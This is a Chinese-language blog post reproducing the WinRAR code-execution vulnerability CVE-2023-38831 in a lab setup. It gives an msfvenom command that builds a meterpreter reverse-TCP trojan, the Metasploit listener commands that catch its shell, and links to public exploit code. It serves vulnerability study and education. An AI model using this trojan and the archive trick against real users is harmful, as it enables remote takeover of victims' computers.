WinRAR代码执行漏洞复现

admin 2024年9月28日12:18:23评论15 views字数 775阅读2分35秒阅读模式

WinRAR代码执行漏洞复现

小记

WinRAR代码执行漏洞复现

该漏洞存在于RARLAB WinRAR中,是一个代码执行漏洞。攻击者可以构造压缩包文件,其中包含一个良性文件(例如普通的. jpg文件)和一个与良性文件同名的恶意文件,诱导用户尝试访问良性文件即可触发漏洞并自动执行该恶意程序,进而控制用户计算机。

影响版本:    <6.23

安全版本:    >= 6.23   

利用方式:

受害者打开压缩包中的 txt/jpg/pdf 等后缀文件

执行 exe (木马)和对应正常的文件。

  • 下载6.11版本用于漏洞复现

WinRAR代码执行漏洞复现
  • 下载exp测试

WinRAR代码执行漏洞复现
  • 模拟受害者机器win10(IP:172.16.29.129)

WinRAR代码执行漏洞复现
  • 模拟攻击者机器kali(IP:172.16.29.136 )

WinRAR代码执行漏洞复现
#kali木马生成exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.29.136 LPORT=8686 -f exe -o /home/kali/ceshi.exe#另起终端监听msfconsoleuse exploit/multi/handler set payload windows/meterpreter/reverse_tcpset lhost 172.16.29.136set lport 8686run
  • 复现1:bat执行calc命令

WinRAR代码执行漏洞复现

双击弹出计算器

WinRAR代码执行漏洞复现
  • 复现2:执行恶意ceshi.exe(钓鱼)

WinRAR代码执行漏洞复现
WinRAR代码执行漏洞复现
  • 恶意exe可以直接复制到目录即可

WinRAR代码执行漏洞复现
WinRAR代码执行漏洞复现
#exp参考https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/https://github.com/Garck3h/cve-2023-38831#winrar下载https://www.winrar.com.cn/download.htm

WinRAR代码执行漏洞复现

原文始发于微信公众号(echoabced):WinRAR代码执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:18:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WinRAR代码执行漏洞复现https://cn-sec.com/archives/2035707.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息